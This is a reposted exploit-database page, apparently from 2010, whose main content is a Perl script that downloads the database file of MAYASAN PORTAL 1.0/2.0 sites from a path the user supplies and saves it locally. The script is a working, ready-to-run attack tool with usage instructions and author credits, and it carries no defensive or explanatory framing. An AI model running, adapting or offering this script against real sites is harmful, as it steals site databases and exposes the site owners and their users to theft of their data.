Home / os / win7

MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit

Posted on 30 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================== MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit ======================================================== #!/usr/bin/perl -w # # MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit # # Found &amp; Coded: ZoRLu # # Tested on my vista proof: http://img37.imageshack.us/img37/3531/testcz.jpg # # Date: 25/07/2010 # # Home: z0rlu.blogspot.com # # Thanks: Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends # # Download : http://mportal.somee.com/indir/v20/v20/v20.zip use LWP::Simple; use LWP::UserAgent; system('cls'); system('title MAYASAN PORTAL V 1.0 / v 2.0 Database Disclosure Exploit'); system('color 4'); if(@ARGV &lt; 2) { print &quot;[-]Ornegi inceleyin &quot;; &amp;help; exit(); } sub help() { print &quot;[+] usage1 : perl $0 site.com /path/ &quot;; print &quot;[+] usage2 : perl $0 localhost / &quot;; } print &quot; ************************************************************************ &quot;; print &quot;* MAYASAN PORTAL V 1.0 / v 2.0 Database Disclosure Exploit * &quot;; print &quot;* Exploited By : ZoRLu * &quot;; print &quot;* msn : admin[at]yildirimordulari.com * &quot;; print &quot;* Home : http://z0rlu.blogspot.com * &quot;; print &quot;********************************************************************* &quot;; ($TargetIP, $path, $File,) = @ARGV; $File=&quot;db/mayasanportal.mdb&quot;; my $url = &quot;http://&quot; . $TargetIP . $path . $File; print &quot; wait!!! &quot;; my $useragent = LWP::UserAgent-&gt;new(); my $request = $useragent-&gt;get($url,&quot;:content_file&quot; =&gt; &quot;C:/db.mdb&quot;); if ($request-&gt;is_success) { print &quot;[+] $url Exploited! &quot;; print &quot;[+] Database saved to C:/db.mdb &quot;; exit(); } else { print &quot;[!] Exploiting $url Failed ! [!] &quot;.$request-&gt;status_line.&quot; &quot;; exit(); } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :